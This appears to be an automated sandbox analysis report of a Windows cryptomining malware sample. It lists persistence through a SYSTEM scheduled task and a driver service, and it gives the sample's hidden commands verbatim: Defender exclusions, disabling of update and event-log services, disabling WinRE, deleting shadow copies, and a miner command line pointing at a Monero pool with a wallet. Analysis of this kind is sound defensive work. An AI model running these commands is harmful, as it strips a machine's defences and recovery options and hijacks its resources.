Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\wmi provider host
Sets the following service settings
- [HKLM\SYSTEM\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '<SYSTEM32>\config\systemprofile\AppData\Roaming\Microsoft\WinMSlPC.{208D2C60-3AEA-1069-A2D7-08002B30309D}\WinRing0x64.sys'
Creates the following services
- 'WinRing0_1_2_0' <SYSTEM32>\config\systemprofile\AppData\Roaming\Microsoft\WinMSlPC.{208D2C60-3AEA-1069-A2D7-08002B30309D}\WinRing0x64.sys
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Update
- Windows Defender
blocks the following features:
- Windows Recovery Environment (WinRE)
- Windows Event Logging
deletes volume shadow copies.
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\'; Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\'; Add-MpPreference -ExclusionPath '%WINDIR%...
Modifies file system
Creates the following files
- nul
- %ALLUSERSPROFILE%\microsoft\winmsips.{208d2c60-3aea-1069-a2d7-08002b30309d}\wmiprvse.exe
- %WINDIR%\temp\__psscriptpolicytest_ci2xuxz1.pu0.ps1
- %WINDIR%\temp\__psscriptpolicytest_zoyfbafr.xek.psm1
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-36-464.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-37-122.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-37-285.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-37-501.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-37-553.dump
- %WINDIR%\temp\__psscriptpolicytest_lf0kdsjf.fvu.ps1
- %WINDIR%\temp\__psscriptpolicytest_35xgeymg.iwv.psm1
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-37-809.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-37-841.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-37-925.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-064.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-216.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-329.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-457.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-579.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-614.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-679.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-710.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-748.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-38-811.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-39-832.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-39-910.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-39-974.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-39-995.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-40-042.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-40-073.dump
- %WINDIR%\temp\content\1208-1728-powershell.exe-18-05-40-760.dump
- <SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\powershell\startupprofiledata-noninteractive
- <SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\winmslpc.{208d2c60-3aea-1069-a2d7-08002b30309d}\svchost.exe
- <SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\winmslpc.{208d2c60-3aea-1069-a2d7-08002b30309d}\winring0x64.sys
Deletes following files that it created itself
- %WINDIR%\temp\__psscriptpolicytest_ci2xuxz1.pu0.ps1
- %WINDIR%\temp\__psscriptpolicytest_zoyfbafr.xek.psm1
- %WINDIR%\temp\__psscriptpolicytest_lf0kdsjf.fvu.ps1
- %WINDIR%\temp\__psscriptpolicytest_35xgeymg.iwv.psm1
Moves itself
- from <Full path to file> to \:tmp
Network activity
Connects to
- 'pa###bin.com':443
- 'bm##i428.su':443
- 'po##.#upportxmr.com':443
TCP
HTTP GET requests
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?79##############
Other
- 'pa###bin.com':443
- 'bm##i428.su':443
- 'po##.#upportxmr.com':443
UDP
- DNS ASK pa###bin.com
- DNS ASK bm##i428.su
- DNS ASK po##.#upportxmr.com
Miscellaneous
Creates and executes the following
- '%ALLUSERSPROFILE%\microsoft\winmsips.{208d2c60-3aea-1069-a2d7-08002b30309d}\wmiprvse.exe'
- '<SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\winmslpc.{208d2c60-3aea-1069-a2d7-08002b30309d}\svchost.exe' -a rx/0 -o pool.supportxmr.com:443 -u 45Bmz1x7xrjT5iN8ZyL1dCZGAB2RmTjCEDnzRH2Q7wrG9QkV321P4oeVKJzUqzeTpp6Pft487YkbGKskBAAEMP5jUbFadqg.worker -p worker -b --no-color --verbose=0 --tls --cpu-max...
Executes the following
- '<SYSTEM32>\cmd.exe' /C net session >nul 2>&1
- '<SYSTEM32>\net.exe' session
- '<SYSTEM32>\net1.exe' session
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' stop UsoSvc
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\sc.exe' stop dosvc
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc
- '<SYSTEM32>\sc.exe' stop eventlog
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled
- '<SYSTEM32>\sc.exe' config UsoSvc start= disabled
- '<SYSTEM32>\sc.exe' config bits start= disabled
- '<SYSTEM32>\sc.exe' config dosvc start= disabled
- '<SYSTEM32>\sc.exe' config WaaSMedicSvc start= disabled
- '<SYSTEM32>\sc.exe' config eventlog start= disabled
- '<SYSTEM32>\cmd.exe' /C rmdir /S /Q "C:\\inetpub" 2>nul
- '<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart >nul 2>&1
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\cmd.exe' /c "reagentc.exe /disable >nul 2>&1 && takeown /f "<SYSTEM32>\reagentc.exe" >nul 2>&1 && icacls "<SYSTEM32>\reagentc.exe" /grant administrators:F >nul 2>&1 && del /f /q "<SYSTEM32>\reagentc.exe...
- '<SYSTEM32>\reagentc.exe' /disable
- '<SYSTEM32>\takeown.exe' /f "<SYSTEM32>\reagentc.exe"
- '<SYSTEM32>\icacls.exe' "<SYSTEM32>\reagentc.exe" /grant administrators:F
- '<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet
- '<SYSTEM32>\schtasks.exe' /create /sc onstart /tn "WMI Provider Host" /tr "%ALLUSERSPROFILE%\Microsoft\WinMSIPS.{208D2C60-3AEA-1069-A2D7-08002B30309D}\WmiPrvSE.exe" /ru "system" /rl highest /f
- '<SYSTEM32>\cmd.exe' /c timeout /t 10 /nobreak >nul && schtasks.exe /run /tn "WMI Provider Host"
- '<SYSTEM32>\timeout.exe' /t 10 /nobreak
- '<SYSTEM32>\schtasks.exe' /run /tn "WMI Provider Host"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\'; Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\'; Add-MpPreference -ExclusionPath '%WINDIR%...' (with hidden window)
- '<SYSTEM32>\sc.exe' stop wuauserv' (with hidden window)
- '<SYSTEM32>\sc.exe' stop UsoSvc' (with hidden window)
- '<SYSTEM32>\sc.exe' stop bits' (with hidden window)
- '<SYSTEM32>\sc.exe' stop dosvc' (with hidden window)
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc' (with hidden window)
- '<SYSTEM32>\sc.exe' stop eventlog' (with hidden window)
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled' (with hidden window)
- '<SYSTEM32>\sc.exe' config UsoSvc start= disabled' (with hidden window)
- '<SYSTEM32>\sc.exe' config bits start= disabled' (with hidden window)
- '<SYSTEM32>\sc.exe' config dosvc start= disabled' (with hidden window)
- '<SYSTEM32>\sc.exe' config WaaSMedicSvc start= disabled' (with hidden window)
- '<SYSTEM32>\sc.exe' config eventlog start= disabled' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C rmdir /S /Q "C:\\inetpub" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart >nul 2>&1' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "reagentc.exe /disable >nul 2>&1 && takeown /f "<SYSTEM32>\reagentc.exe" >nul 2>&1 && icacls "<SYSTEM32>\reagentc.exe" /grant administrators:F >nul 2>&1 && del /f /q "<SYSTEM32>\reagentc.exe...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /sc onstart /tn "WMI Provider Host" /tr "%ALLUSERSPROFILE%\Microsoft\WinMSIPS.{208D2C60-3AEA-1069-A2D7-08002B30309D}\WmiPrvSE.exe" /ru "system" /rl highest /f' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c timeout /t 10 /nobreak >nul && schtasks.exe /run /tn "WMI Provider Host"' (with hidden window)
- '<SYSTEM32>\config\systemprofile\appdata\roaming\microsoft\winmslpc.{208d2c60-3aea-1069-a2d7-08002b30309d}\svchost.exe' -a rx/0 -o pool.supportxmr.com:443 -u 45Bmz1x7xrjT5iN8ZyL1dCZGAB2RmTjCEDnzRH2Q7wrG9QkV321P4oeVKJzUqzeTpp6Pft487YkbGKskBAAEMP5jUbFadqg.worker -p worker -b --no-color --verbose=0 --tls --cpu-max...' (with hidden window)
